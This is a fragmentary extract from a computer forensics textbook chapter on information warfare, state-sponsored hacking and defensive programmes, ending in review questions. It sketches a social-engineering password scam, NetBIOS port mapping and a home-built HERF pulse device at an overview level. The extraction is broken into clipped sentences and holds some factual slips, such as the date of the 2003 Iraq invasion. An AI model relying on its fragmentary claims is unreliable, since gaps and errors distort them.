He calls and identifies himself as Bert Jackson, who has just
been hired by the boss
...
Unfortunately, he’s forgotten his password and it’s already 11 P
...
Can he get a new password or should he call the CEO and have him
call? In a shop with strong security, that would be an easy call, but it’s easy to see
that, in many cases, the call center worker would simply trust that the caller is who
he says he is and give out a new password
...

If the company is also a prime contractor for the government, a public utility,
or even a company whose success or failure can severely impact the stock market,
then the attacker has gained a tremendous advantage by simply manipulating information he or she has gained by infiltrating the system
...
That group,
perhaps over a period of months, maps IP ranges that are known to belong to public Internet service providers (ISPs) providing high-speed, always-on access to individuals and small businesses and they map for the Netbios ports
...
Even though these passwords may be encrypted, with modern cracking tools being what they are, at the end of the mapping period, they very
well could have discovered thousands of accounts, including Bert Jackson’s, that
could be exploited
...
The distributed nature of this attack would make detection and prevention difficult, if not impossible, and would certainly create an atmosphere of fear and distrust that would severely affect the general economy
...
If the preceding scenario were executed by organized crime, it would probably fall into the battlefield type because they probably
would be looking to cause a drop in stock market prices where they could step in
and buy cheaply, thus allowing them to see an impressive gain as confidence rebounded
...
The attackers might be trying to distract the attention of the current administration away from what they might be attempting elsewhere (strategic) or attempting to bring together the economic resources needed to
launch a more serious battlefield attack against us later (consolidation)
...
However, trust also seems to be a social construct between two or more individuals
...

If that is the case, then how does the U
...
government overcome this tendency
and protect their critical resources? Part of the difficulty they face here is that their
focus tends to be on strengthening the security of their physical defenses, whether
that be through encryption, perimeter-based defenses, host-based defenses, or,
preferably, a combination of the three
...
S
...
These are technological trust defenses and likely will always be open to
attack
...
S
...
Why do computer viruses such as the “I Love You” virus of few years ago work? Because users,
whether corporate, government, or private, haven’t been taught how to protect
themselves and change the paradigm of automatically trusting the email that announces it comes from Aunt Barbara
...
S
...
When virtually all private connections to the
Internet were made over modems connecting to a dynamic host configuration protocol (DHCP) server where each session was served with a different IP address, it
was much less likely that a private machine would be compromised and efforts to
compromise machines tended to be focused on commercial, government, and

Fighting Against Macro Threats

339

educational systems
...
They also must understand the need to properly filter
their outgoing traffic to block and detect activity coming from within their networks that can be harmful to the general Internet community
...
The recent proliferation of email-related viruses has certainly awakened many to the dangers, but
there must be a broader effort to educate and assist users in protecting themselves
and the U
...
government from the bad guys
...
Psyops can work both ways
...
S
...
So it is with perception management
...
S
...
In helping them to protect themselves, the U
...
government also helps
protect the rest of the users on the Internet who could be attacked by their systems
if they are compromised
...
In a global environment where criminals, unfriendly political forces, and people who just don’t care about others have the same rights and access as anyone, trust can be dangerous
...
The U
...
government can
pass all the laws it wishes, but it won’t affect the traffic that is coming out of countries such as Korea, China, and Singapore
...
If the U
...
government knows what needs to be
done and doesn’t communicate it effectively, then whatever else it does is irrelevant
...


ARE OTHER GOVERNMENTS PREPARED
FOR INFORMATION WARFARE?
Are other governments ready to use information-age tricks against their adversaries? Yes, to some extent
...
S
...
Why did the department think his
computers were attacking theirs? The answer turned out to be startling
...


340

Computer Forensics, Second Edition

Rather, someone had lifted their electronic identities
...

Web hacking, it seems, isn’t just for amateurs anymore
...
From Beijing to Baku, governments and
their surrogates are using the Internet to harrass political opponents and unfriendly
neighbors, to go after trade secrets, and to prepare for outright warfare
...
Dissidents describe the attacks
as inept—proof, perhaps, that dictatorships are still behind the hacking curve
...
In January 2000, hackers from Azerbaijan with names
like “The Green Revenge” and “Hijack” tampered with dozens of Armenian-related
Web sites, including host computers in the United States
...
Relations are tense between Azerbaijan and Armenia, who fought a war over the disputed territory of Nagorno-Karabakh, so it
wasn’t long before the Armenians retaliated in kind
...

In Cheng Wang’s case, his computers in Hauppauge, New York, were among
the Falun Gong sites around the world hit by a barrage of hacking attempts and
email “bombs” that coincided with a physical crackdown on the group’s practitioners in China
...

It is often difficult to track down who is to blame, but for networked Americans, who own 60% of the world’s computing capacity, such electronic conflict
should be unsettling
...
A senior CIA official cited a Russian general
who compared the disruptive effects of a cyberattack on transportation or electrical grids to those of a nuclear weapon
...
The Pentagon isn’t sitting still
either
...
S
...
S
...

Nearly as worrisome as a cyberattack to experts is electronic espionage
...
One of the worst computer security

Fighting Against Macro Threats

341

breaches in U
...
history that spawned an investigation was named Moonlight Maze
...

Successful cyberwar is likely to be like that—no exploding munitions to tell
someone they’re under attack
...
The longer a cyberspy
conceals his or her presence, the longer the intelligence flows
...

During the Kosovo bombing campaign in 1999, the Pentagon set up a highlevel information-operations cell
...
By the time Pentagon lawyers approved cyberstrikes against Serbia, events had overtaken the need for them
...
The line between fairgame military sites and civilian infrastructure may not exist
...
If someone tampers with somebody else’s control mechanisms, how assured are those individuals that it would stop right there? The United
States, more dependent on computer networks than anyone, might lose the most in
legitimizing cyberwar
...

Among the sites hacked in the Caucasus Web war was one belonging to the
Washington, D
...
–based Armenian National Institute, which studies the
1915–1918 Turkish genocide of Armenians
...
armeniangenocide
...

One Austin, Texas–based corporation already has its own rules
...

The company will not license the technology to nine countries and three U
...
government agencies because of the potential for privacy abuse [3]
...
In 1998, a company tried to buy rights to
the technology
...


WHAT INDUSTRY GROUPS HAVE DONE TO
PREPARE FOR INFORMATION WARFARE
On December 18, 2000, the National Security Council held the first meeting of the recently formed Cyberincident Steering Group, aimed at fostering cooperation between
private industry and government to secure systems from domestic and international

342

Computer Forensics, Second Edition

cyberattack
...
Among topics discussed were the creation of a rapid response
system and communications between industry and government
...
S
...
S
...
According to the report, foes of a militarily dominant United States,
rather than challenging it head-on, would seek to target an Achilles’ heel in cyberspace or threaten the use of the deadliest chemical, nuclear, or biological weapons
(see sidebar, “Doomsday Software”)
...
With their identity hidden behind a web of front companies and
subcontractors, Aum engineers sold as many as 200 systems ranging from databases
for clients to an Internet messaging service
...
In the mid1990s, sect members burglarized and stole secrets from Japan’s top defense contractor and its top semiconductor maker—part of an extraordinary campaign to develop
biological agents, laser guns, and other high-tech weapons
...
That may
soon change
...
S
...
Over
time, attacks are increasingly likely to be fired off through computer networks rather
than conventional arms, as the skill of U
...
adversaries in employing them evolves
...
S
...
The interagency, FBI-led National Infrastructure Protection Center, uses a slide depicting China’s Great Wall in its standard presentation on cyberthreats, along with a quote from Sun Zi, author of a treatise on war in about 350
B
...
“Subjugating the enemy’s army without fighting is the true pinnacle of excel-

Fighting Against Macro Threats

343

lence,” the FBI’s slide quotes the ancient Chinese strategist as saying
...

Industry Groups Prepare to Fight Cyberattacks
A group of technology heavyweights including Microsoft and Intel have recently unveiled a new resource in their efforts to strengthen cybersecurity
...
Participants in the
undertaking, dubbed Information Technology Information Sharing and Analysis
Center (IT-ISAC), exchange information about their security practices
...
In attendance during the outline of the goals were representatives
from Microsoft, AT&T, Oracle, IBM, Hewlett-Packard, Computer Associates, EDS,
Entrust Technologies, KPMG Consulting, Cisco Systems [4], Nortel Networks, and
other companies
...
Members have created the center in hopes of improving responses to cyberattacks and hacking against
corporate computer networks
...
In such attacks, aimed at organizations large and small, some
hackers may deface a Web site with graffiti or more pointed messages
...
Many companies
have increased security measures to safeguard valuable intellectual property, but a
number of reports indicate that most continue to be vulnerable to such incidents
...
Tech companies reported the majority of those hacking incidents
...

Following a string of attacks on federal systems, President Clinton in 2000
launched a $2 billion plan for combating cyberterrorism that included an educational initiative to recruit and train IT workers
...
With the aftermath of the 9-11 terrorist attacks, the Bush administration expanded this plan 50-fold
...
” For most people, it is obvious that the political and
economic aspects of the national security policies of the United States are developed
by the national political authorities (the president and Congress) and, in dealing
with foreign states or groups, executed by the Departments of State, Commerce,
Agriculture, and so on
...
Few, however, pay much attention to just how and by whom psychological
forces are to be developed to support national policies
...

This new form of warfare has become known as information warfare (IW)
...
Such a strategy would include
clear doctrine and a policy for how the armed forces will acquire, process, distribute, and project knowledge
...
S
...
Such an expansion would mirror the evolution of
traditional warfare toward IW
...
As
“first wave” wars were fought for land and “second wave” wars were fought for control over productive capacity, the emerging “third wave” wars will be fought for
control of knowledge
...

Currently, there is neither formal military doctrine nor official definitions of
IW
...
Despite the lack of an authoritative definition, “netwar” and “cyberwar” are emerging as key concepts in discussing IW
...

Netwar is a societal-level ideational conflict waged in part through internetted
modes of communication
...
Netwar is about ideas and epistemology—what is known and
how it is known
...

The target of netwar is the human mind
...
Consider, for example, Radio Free Europe, the Cominform, Agence France Presse, or
the U
...
Information Agency
...
The emerging of nongovernmental political actors such as
Greenpeace and Amnesty International, as well as survivalist militias and Islamic
revivalists, all with easy access to worldwide computer networks for the exchange of
information or the coordination of political pressure on a national or global basis,
suggests that governments may not be the only parties waging information wars
...
It would be comforting to believe that the tried and true methods (and limitations) of propaganda still worked
...
The war contained many elements of classic propaganda: accusations of bombed baby-milk factories and stolen
baby incubators; inflated rhetoric and inflated stakes of the conflict; the future of the
new world order and “the mother of battles” for the future of Islam; and the classic
us or them polarization in which neutrality or unenthusiastic support was decried
...
While Saddam
Hussein became the new Hitler and President Bush, Sr
...
All of that changed,
however, during the second invasion of Iraq in May of 2003 by George Bush, Jr
...
Indeed, there may have been a spark
of netwar genius in treating the Islamic Iraqi soldiers as “brave men put into an impossible situation by a stupid leader
...
There may have been a glimpse of future netwar: it is rumored that
Baghdad Radio signed on one morning with “The Star-Spangled Banner
...

Contemporary technologies have the potential to customize propaganda
...
Contemporary databases and multiple channels for information transmission have created
the opportunity for custom-tailored netwar attacks
...

A major new factor in IW results directly from the worldwide infosphere of
television and broadcast news
...
This media-created universe is

346

Computer Forensics, Second Edition

dubbed fictive rather than “fictional” because although what is shown may be true,
it is not the whole, relevant, or contextual truth, and, of course, the close etymological relationship between fictive and fictional suggests how easy it is to manipulate the message
...
Somalia gets in the news and the United States gets into Somalia despite the reality of
equally disastrous starvation, disorder, and rapine right next door in Sudan
...
The potential for governments, parties in a civil war such as Bosnia, rebels
in Chiapis, or even non-state interests to manipulate the multimedia, multisource
fictive universe to wage societal-level ideational conflicts should be obvious
...
The
niche-manipulation potential available to states or private interests with access to
the universe of internetted communications, such as the networks over which business, commercial, and banking information are transmitted could easily provoke financial chaos
...

Direct satellite broadcast to selected cable systems [5], analogous to central
control of pay-per-view programs, again offers the potential for people in one
province or region of a targeted state to discover that the highest level of their leadership has decided to purge their clansmen from the army
...

Fictive Broadcasts
When the new, but already well-understood, simulation technologies of the tekwar
and MTV generation are added to the arsenal of netwar, a genuinely revolutionary
transformation of propaganda and warfare becomes possible
...
The credibility of the opponent was the target,
and the strategic intention was to separate the government from the people
...
Stored video
images can be recombined endlessly to produce any effect chosen [6]
...


Fighting Against Macro Threats

347

Of course, truth will win out eventually, but by the time the people of the targeted nation discover that the nationwide broadcast of the conversation between
the maximum leader and George W
...
Netwar is beginning to enter the zone of illusion
...
Here’s how it might work: Through hitching a ride on an unsuspecting commercial satellite, a fictive simulation is broadcast
...
These info-niche targets, and the information they receive, are tailored to the strategic diplomacy needs
of the moment: some receive reinforcement for the fictive simulation; others receive the real truth; still others receive slight variations
...
This is not traditional propaganda in which the target is discredited as
a source of reliable information
...
What is being attacked in a strategic level netwar are not only the
emotions, motives, or beliefs of the target population, but the very power of objective reasoning
...

Let us return to the previous scenario to play out its effects
...
George W
...
In a society under assault across its
entire infosphere, it will become increasingly difficult for people to verify internally
the truth or accuracy of anything
...

At the strategic level, the ability to observe is flooded by contradictory information and data; more important, the ability to orient is weakened by the assault
on the possibility of objective reasoning; decisions are made increasingly in response to a fictive or virtual universe and, of course, governmental and military actions become increasingly chaotic, as there is no rational relationship of means to
ends
...

Reality, however, may be far more complex than the infowarriors yet imagine,
and victory not so neat
...

Victory may be too costly, as the cost may be truth itself
...
That is, the question
must be raised whether using the techniques of IW at the strategic level is compatible with American purposes and principles
...
There are good reasons to be skeptical
...
The substantive purpose of
communication is the building or developing of the individual human personality
...
It is the glue that binds a
society together
...
At a more serious level, the debates in American society about prayer
in the public schools illustrate a recognition of the substantive and formative nature
of communication in society
...

Finally, any real-world society rests on substantive communication and understanding among its members
...

The efforts of several nations such as China, Iran, and Saudi Arabia to insulate
their societies from the effects of the global communications network, illustrate
their awareness that their cultures and societies may depend on a distinctive shared,
substantive universe of discourse
...
That France seeks to limit the percentage of foreign broadcast material and
American films in Europe illustrates the seriousness with which they consider the
substantive nature of communication
...
Pragmatic communication is defined by its goal and consists of the

Fighting Against Macro Threats

349

universe of techniques designed to influence other persons to behave in ways the
communicator wishes
...
Most political and commercial communication is merely pragmatic
...
This pragmatic use of communication as an attempt at perception manipulation is, of course, the central essence of
IW
...

Finally, the intoxicant function of communication in American society is
equally straightforward
...

Civil communication, or public discourse, in contemporary American society
is dominated almost entirely by the intoxicant and pragmatic modes
...

Pluralistic America is supposed to be a society in which the formation of character and opinion is left, through the use of various means of communication, to
private initiative
...

The official military view of diplomatic strategy is the art and science of developing and using political, economic, psychological, and military force as necessary
during peace and war to afford the maximum support to policies, to increase the
probabilities and favorable consequences of victory, and to lessen the chances of defeat
...
A slightly different view of strategy, however,
may highlight a problem of IW
...

Sound military strategy requires influencing the adversary decision maker in
some way that is not only advantageous but also reasonably predictable
...
A national security strategy of IW or netwar at the strategic
level (that is, societal-level ideational conflict waged in part through internetted
modes of communication) and an operational-level cyberwar or command-andcontrol warfare campaign to decapitate the enemy’s command structure from its
body of troops may or may not be advantageous but, more important, is unlikely
to produce effects that are reasonably predictable
...
If the
goal is influencing the adversary’s ability to observe by flooding them with corrupted

350

Computer Forensics, Second Edition

or contradictory information and data, disrupting their ability to orient by eliminating the possibility of objective reasoning, and forcing their decisions to respond to a
fictive or virtual universe, actions will, of course, be produced
...

The military operational-level of cyberwar or command-and-control warfare
appeals to the infowarrior as an attractive military strategy
...

A successful diplomatic cyberstrategy depends on the ability of the local military
commander to deploy his or her power assets, especially combat forces, not merely
to dominate the enemy’s decision cycle (which, after all, has just been rendered
chaotic), but to exploit opportunities as they evolve unpredictably from the disoriented, decapitated, or irrational enemy actions
...

Diplomatic cyberstrategy is the control of the evolution of the battlefield or theater power distribution to impose the allied commander’s order on the enemy’s
chaos
...
Merely
defeating hostile military forces may be insufficient
...
Operational-level cyberwar may,
then, be that very acme of skill that reduces the enemy will without killing
...

Strategic Diplomatic Implications
The tools, techniques, and strategy of cyberwar will be developed and, during
wartime, should be employed
...
Such a development would certainly be prudent
...
This application may not be prudent, however, as there are serious reasons to doubt the ability of the United States to
prosecute an information war successfully
...
Our communications infrastructure, the information highway, is wide open
...
Also, one may find physical control and security to be impossible
...
In the future, these may not
be amateurs, but well-paid “network ninjas” inserting the latest French, Iranian, or
Chinese virus into AOL or other parts of the Internet
...
Currently, for example, over 101,000 Internet databases are being
used by over 543 million people in over 163 nations
...
The spy flap between France and the United States over alleged U
...
attempts to gather data on French Telecom may be indicative of the future
...

It will certainly be expensive: the U
...
business community and the U
...
armed
forces are required to devote ever more resources and attention to computer, communications, and database security
...

The second reason to doubt U
...
ability to prosecute an information war is that
the political and legal issues surrounding IW are murky
...
Which committees of
the House or Senate would have control and oversight of policies attendant to IW?
Which would have the power to inquire into the judgment of a local ambassador or
military commander who wished to use the tools of cyberwar for a perception manipulation in peacetime that would shape the potential wartime environment?
The U
...
armed forces only execute the national military strategy—they do not
control it
...
They
are simultaneously, albeit unintentionally, developing the tools and capabilities
to execute a national strategic IW strategy
...
Congressional oversight of the development of
a national strategic-level information war capability is even more essential than
oversight of the intelligence community
...
S
...
Pluralism is a great strength of American society but perhaps a drawback in waging information war
...
Because there is no single view of what is morally acceptable, but simply a host of contending views, a national security strategy of IW could be
developed by the national security decision makers who lacked a moral consensus
...
Unless the
goal of an information war is merely to unhinge people from their ability to reason
objectively, and thereby create an interesting problem for post-conflict reconstruction, any strategic-level netwar or information war would require the ability to
communicate a replacement for the discredited content of the target society
...
Put in terms of such a
concrete policy goal, the philosophically problematic nature of information war becomes outrageously obvious
...
S
...
S
...
Indeed, the United States might be able to
loose anarchy in a society, but that is not usually the political goal of war
...
Translated to the strategic level, however, netwar or infor-

Fighting Against Macro Threats

353

mation war is not a prudent national security or military strategy for the simple reason that neither the armed forces nor any other instruments of national power
have the ability to exploit an adversary’s society in a way that promises either advantageous or predictable results
...
Conflict resolution, including ending wars this side of blasting
people into unconditional surrender, assumes and requires some rationality—even
if that rationality is the mere coordination of ends with means
...
However, a successful
all-out strategic-level information war may have destroyed the enemy’s ability to
know anything with certainty and, thereby, their capacity for minimal reasoning or
pragmatic communication
...

Precisely how war termination would have been accomplished without an effective
leadership will remain, we can hope, one of the great mysteries
...
That
is, the credibility and legitimacy (even the physical ability to communicate) of the
decision makers will be compromised or destroyed relative to their own population
and in terms of their own worldview
...
How does the United States accomplish conflict resolution, war
termination, or post-conflict reconstruction with a population or leadership whose
objective reasoning has been compromised?
Just as the mutually destructive effects of nuclear war were disproportionate to
the goals of almost any imaginable conflict, so may be the mutually destructive effects of a total information war exchange on the publics exposed and subsequent
rational communication between the sides
...

Information war, then, may be the central national security issue of the 21st
century
...
To facilitate this objective,
the U
...
armed forces are developing, under the rubric of command-and-control
warfare, the technologies and systems that will provide the capability for cyberwar
...
Many of the same technologies and
systems can be used to develop a national-level capability for strategic netwar
...
It may not be possible to control and exploit information and information technologies to impose a form on the remnants of societies no longer capable of self-organization because their substantive universe of
meaning has been destroyed or corrupted
...

Perhaps strategic-level information war is, indeed, like nuclear war: the capability
is required for deterrence—its employment, the folly of mutually assured destruction
...

It is useless to pretend that the proliferation of these technologies will not provide capabilities that can do serious harm
...
It is almost universally agreed that these capabilities are essential on the
contemporary battlefield
...


THE ROLE OF INTERNATIONAL ORGANIZATIONS
Information on countries with offensive IW initiatives is less authoritatively documented, but studies and foreign press reporting help point to international organizations that probably have such an initiative under way
...
S
...
At the low end, in
June 1998, the director of central intelligence stated that several countries are sponsoring IW programs and that nations developing these programs recognize the
value of attaching their country’s computer systems—both on the battlefield and in
the civilian arena
...
The June 2002 National Communications (NCS) report on the threat to U
...
telecommunications states that the National Intelligence
Council reports that, among these, Russia, China, and France have acknowledged
their IW programs
...
1)
...
1 Publicly Identified Foreign Countries Involved in Economic Espionage, and
Information Warfare: Initiatives and U
...
Remediation
Economic
Espionage

Information Warfare
Initiative

Major Remediation
Provider

Belarious

Yes





Bulgaria

Yes*

Yes



Canada

Yes*

Yes

Yes

China

Yes*





Cuba

Yes*

Yes

Yes

France

Yes*

Yes

Yes

Germany

Yes*

Yes

Yes

Hungary

Yes





India

Yes*

Yes

Yes

Iran

Yes*

Yes

Yes

Ireland





Yes

Israel

Yes*

Yes

Yes

Japan

Yes*





Moldavia

Yes





Pakistan

Yes



Yes

Philippines

Yes



Yes

Poland

Yes





Romania

Yes





Russia

Yes*

Yes



North Korea

Yes*





South Korea

Yes*





Taiwan

Yes*





Country

*Countries identified by NCS as using electronic intrusions usually for economic espionage
purposes
...
All of these
countries publicly acknowledge pursuing defensive IW initiatives to protect their
military information capabilities or national information infrastructure:
India established a National Information Infrastructure-Defensive group several years ago, apparently in response to China’s growing interest in IW
...

Taiwan also recently announced the creation of a task force to study ways to
protect their information infrastructure from the growing IW threat from
China
...
Defensive measures (deterrence, protection, and restoration) are difficult to implement without also developing an understanding of potential adversaries, investing
in computer and software development, and creating a major operational capability—all steps directly applicable to creating an offensive IW capability
...

The presence of a defensive IW initiative, however, is inadequate alone to assess
that a foreign country is also developing its offensive counterpart
...
For instance, Israel was involved in the 1991 penetration of U
...
defense
computers and copying of the Patriot missile defense system, according to the NCS
report
...

Ranking the Risks
The results of this analysis point to a tiered set of foreign national risks to U
...
computing and network systems remediation involving the insertion of malicious code
...

On the other hand, France, Germany, Russia, and Taiwan comprise a second
tier of countries that have been identified as participants in economic espionage
against the United States and that have developed initiatives but are not believed to
be major foreign sources of U
...
remediation services
...
Also, the governments and companies in countries that have engaged in
economic espionage against the United States may also utilize this unique opportunity to take advantage of these espionage objectives
...
Analysis of the software and testing for trap doors and other accesses
are key elements in this risk reduction
...
Evaluators should ensure that all the program code has a legitimate business purpose; any user code should be extracted
...
Customers may want the source code to be
shared with the evaluator so its integrity can be examined
...


358

Computer Forensics, Second Edition

Preventing unauthorized access in the future is a second essential step in ensuring the integrity of the system or network
...
At a
second level, a red team approach (actually trying the software) can be taken to explore more deeply whether trap doors exist
...
These software accesses
should be protected and be able to identify and halt delivery of malicious code
...
They can
also use such evidence to compare similar events and facilitate the restoration of
protected service to the system
...

Proposed Cyber Crime Laws Stir Debate Within International Organizations
Lots of countries still haven’t updated their laws to cover Internet-based crimes,
leaving companies in many parts of the world without legal protections from malicious hackers and other attackers who are looking to steal their data
...
Of special concern is a proposed cyber crime
treaty being developed by the 41-nation Council of Europe, which some business
groups fear could affect corporate data-retention policies
...
Those
concerns were echoed by attendees at a forum on international cyberlaw sponsored by McConnell International LLC, the consulting firm that issued the new report on cyber crime laws
...
They fear that they are
moving toward not too little law but too much law
...
There is competition among countries for leadership and excellence in the
digital economy
...

The European Cyber Crime Treaty was approved in 2002 and was recently
adopted by the United States and other countries outside of Europe
...
The treaty also seeks to prevent data
havens—areas in which laws governing cyber crimes are weak
...
There is so much gray area
...
Internet service providers are worried
that they may face new obligations to hold onto data in response to requests from
law enforcers
...
Clarification on the data-retention issue is going
to be needed
...
to prevent French citizens from trafficking in Nazi paraphernalia
...


THE ROLE OF GLOBAL MILITARY ALLIANCES
The following discussion highlights what actually constitutes global military alliances with regard to information operations
...

Military
A look into the future of IW indicates an increasing role for information operations
and the emergence of IW as a new paradigm of warfare
...
These
global planners must also remember that IW is emerging as a paradigm of warfare,
not a paradigm of information
...
Although there may be less bloodshed in an information war, human suffering will, in all likelihood, result
...
Information technology does not make war any more
acceptable to a civilized society
...


360

Computer Forensics, Second Edition

Global Information
Although seemingly self-explanatory, understanding the nature of global information alliances is important
...
The processing of data into
information involves placing the data into some context
...
The result is information, and this is created and
manipulated to enable decisions to be made
...

Information, or any developed form of the information, is only one part of an
information technology system
...
Any one of the individual elements of the information
technology system, as well as the information technology system processes that
convert the raw data into various forms of information, may provide a suitable target on which influence may be exerted
...

Global Operations
Global information operations seek to influence the decision-making process
...

They are activities directly focused on warfare and include offensive and defensive
activities aimed at all levels of the decision-making process
...
When correctly applied, offensive global information
operations alliances can be just as lethal as the employment of conventional
weapons
...
The resultant crash will destroy the aircraft, and generally
kill the pilot and crew, just as effectively as the best air-to-air missile
...


Fighting Against Macro Threats

361

MARSHALL LAW AND CYBERSPACE
Realistically, there are a number of scenarios, each of varying degree, in which IW
might be utilized in the future in cyberspace and thus bring about Marshall Law
...
Many scholars have put
forth arguments concerning the formation and survivability of hegemonic powers
...
Under this scenario, realist concerns run rampant, as the United States has a vested interest in becoming the
hegemon for the next power cycle
...
A scenario where stability and consistency for information technologies are derived from cooperative international endeavors to
promote and facilitate global prosperity is more likely
...
Information technology is cooperative by nature and tremendous benefits can be derived from greater
interconnectivity
...
Once that integration takes place, each connected
nation will have an interest in maintaining the stability and survivability of the
overall network
...

Despite collective interests, information terrorism will continue to be a viable
national security concern for all third wave nations
...
S
...
By increasing security and gathering
intelligence regarding any plans that might be in consideration, the United States
can ensure that the threat of terrorism is contained to isolated incidents from which
this country can recover
...

Other likely scenarios include the use of IW for blackmail or for limited shortterm gains
...
Will nations allow IW threats to be used as blackmail?
Will the United States allow limited IW in order to pursue strategic or comparative
political and economic gains or is the fear of escalation an adequate deterrent to
such ambitions? These questions must also be addressed
...
Life in cyberspace is more egalitarian than elitist and more decentralized than hierarchical
...
One might think of cyberspace as

362

Computer Forensics, Second Edition

shaping up exactly like Thomas Jefferson would have wanted: founded on the primacy
of individual liberty and commitment to pluralism, diversity, and community
...
As a nation, the United States must make sure
that the structure it is building has a strong foundation and that weaknesses in that
structure are not used to destroy it
...
S
...
However, it is a
task the United States must undertake
...
If the United States does not address these issues now, the future of our
country will be jeopardized
...
Some of these issues concern
national security; others concern individual privacy
...
Fundamental issues arise from hacker explorations
...
Recent efforts in cloning produced a
human fetus
...
They argued that before experimentation in
cloning continued, the United States must decide as a society which direction that
the new technology will go, what ends it hopes to achieve, and what the limits on
the use of this new technology should be
...
There is no need to stop the technology, but the United
States must decide what direction it wants the technology to take and what rules
will govern the use of this technology
...

The United States certainly is, as former Vice President Al Gore noted, in the
midst of an Information Revolution
...
Conceptions of national security will have to evolve as well
...
Isaac Asimov
(noted science fiction author) notes that waiting for a crisis to force the United States
to act globally runs the risk of making them wait too long
...
Similarly, philosophy comes bundled with every new technology; when one is
embraced, the other is there as well
...
The United States must be prepared to deal with a philosophy that

Fighting Against Macro Threats

363

changes the distribution of power, changes political relationships, and challenges the
essence of nation states
...


THE SUPER CYBER PROTECTION AGENCIES
Some might call it paranoia, but the U
...
government is growing increasingly worried that foreign infiltrators are building secret trapdoors into government and
corporate networks with the help of foreign-born programmers doing corporate
work—their regular jobs
...
S
...
According to the CIA, these two countries
each have plans to conduct information warfare, and planting trapdoors wherever
they can would be a part of that
...

HERF Guns Work
Though still secretive about the practice, nations are also building futuristic radiopulse devices (popularly called high-energy-radio-frequency [HERF] guns) that
can disrupt or destroy electronics in networks, cars, airplanes, and other equipment
by sending an energy beam at them
...
This conference typically draws a large crowd of government spooks and high-tech strategists from around the world
...
Russia is also viewed as a threat because it has defensive and offensive IW
programs under way
...

Israel has already hacked its way into U
...
computer systems to steal information
about the Patriot missile
...
The United States can’t allow the emergence of another area of
confrontation
...
The first step in the cyberdisarmament process is to get the nations of the world to discuss the issue
openly
...


364

Computer Forensics, Second Edition

The U
...
Department of Defense has complained in meetings with congressional subcommittees that it has seen severe network-based attacks coming from
Russia
...
IW is now viewed by the CIA as a bigger threat than biological or nuclear weapons
...

HERFs Are Easy to Make
More than traditional hacker techniques comprise infowar
...
People are spending a lot of
money on cyberweapons
...

A former engineer at the Naval Air Warfare Center hooked up a 4-foot parabolic antenna powered by ignition coils and parts from a cattle stun gun during one
Infowar session
...
With not
much more than $900 in parts, he directed a 300-MHz pulse at a computer running
a program
...

It’s high school science, basically
...
The computer industry is going to have to sit up and take note
...

Corporate Cyber Crime Program
Recently, the FBI (the other Super Cyber Protection Agency) officially announced
the formation of its InfraGard program, a cyber crime security initiative designed
to improve cooperation between federal law enforcement officials and the private
sector (after completing the process of setting up InfraGard chapters at its 59 field
offices)
...
The final local chapter, composed of information security experts from companies and academic institutions,
was put in place in December 2000 in New York
...
The program allows law enforcement and industry to work together and

Fighting Against Macro Threats

365

share information regularly, including information that could prevent potential
intrusions into the U
...
national infrastructure
...
The
problem, according to sources, has been that the FBI treats all potential cyber
crimes as law enforcement investigations first and foremost—a stance that effectively bars access to information by other government security agencies
...

The InfraGard announcement was one of several rather belated efforts by the
outgoing Clinton administration in 2000 to create new security structures
...
These new programs will
have a better chance of survival if they can demonstrate that they’re already accomplishing useful objectives
...
Even though the InfraGard program hasn’t had much of an effect on corporate users thus far, more than 900 businesses have already signed up to participate
in the program; and, the FBI is still getting applications daily from companies who
want to go through the motions of being part of a chapter
...
The program has had a beneficial impact
because it lets companies share information on security vulnerabilities without creating the levels of hysteria that usually accompany highly publicized reports of
hacking attacks and other cyber crimes
...
U
...

allies and potential coalition partners are similarly increasingly dependent on various information infrastructures
...

There is no front line
...
), control, communications, and intelligence
targets
...
S
...

The post–Cold War “over there” focus of the regional component of U
...
national military strategy is, therefore, inadequate for this kind of scenario and is of
declining relevance to the likely future international strategic environment
...
An
in-depth examination of the implications of IW for the United States and allied infrastructures that depend on the unimpeded management of information is also required in the fight against macro threats—defensive strategies for governments
and industry groups, as follows
...
Information systems expertise and access to important networks may be the only prerequisites
...

Expanded role for perception management: New information-based techniques may substantially increase the power of deception and of imagemanipulation activities, dramatically complicating government efforts to build
political support for security-related initiatives
...
A new field of analysis focused on strategic IW may
have to be developed
...

Difficulty building and sustaining coalitions: Reliance on coalitions is likely
to increase the vulnerabilities of the security postures of all the partners to
strategic IW attacks, giving opponents a disproportionate strategic advantage
...
S
...
Given the increased reliance of the U
...


Fighting Against Macro Threats

367

economy and society on a high-performance networked information infrastructure, a new set of lucrative strategic targets presents itself to potential IWarmed opponents
...
Major recommendations have emerged that address
this shortcoming
...
S
...

With the preceding in mind, when completing the Defensive Strategies for
Governments and Industry Groups Checklist (Table F13
...
The order is not significant; however, these are the activities for which
the researcher would want to provide a detailed description of procedures, review,
and assessment for ease of use and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...


CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...

3
...

4
...
This new form of warfare has become known as information
warfare (IW)
...
True or False? Any discussion of information warfare, netwar, cyberwar, or
even perception manipulation as a component of command and control warfare by the armed forces of the United States at the strategic level must occur in
the context of the moral nature of communication in a pluralistic, secular, and
democratic society
...
The following countries publicly acknowledge pursuing the defensive IW initiatives goal of protecting their military information capabilities or national
information infrastructure, except for one:
A
...

B
...

C
...

D
...

2
...
Have the major foreign providers of software remediation services to Israel
and, to a lesser extent, India, acknowledged a defensive IW or national information infrastructure protection program, and have they also met at
least one of the supplemental criteria?
B
...
Have authoritative, but unofficial, host country sources suggested that a
country has an offensive IW program?

Fighting Against Macro Threats

369

D
...
At the strategic level, the ability to observe is flooded by:
A
...
The decisions that respond increasingly to a fictive or virtual universe
C
...
The notion that there is no rational relationship of means to ends
E
...
The following are conclusions drawn from fighting against macro threats,
except:
A
...
Blurred traditional boundaries
C
...
High entry cost
E
...
Action steps in preparing for defensive strategies for governments and industry groups include the following, except:
A
...
Risk assessment
C
...
Government role
E
...
The irregularities were serious enough to
potentially necessitate a re-stating of earnings
...
They retained a computer forensics specialist (CFS) to conduct large-scale data mining to get to the bottom of the irregularities
...

The bank sent the computer to a CFS team (CFST) for a forensic examination
...
How did the CFS go about conducting the investigation?
Optional Team Case Project
A woman employed by a large defense contractor accused her supervisor of sexually harassing her
...
How did the CFS go about
conducting the investigation?

REFERENCES
[1] Vacca, John R
...

[2] Vacca, John R
...
, Charles River Media, Hingham, MA, 2001
...
, Net Privacy: A Guide to Developing and Implementing an
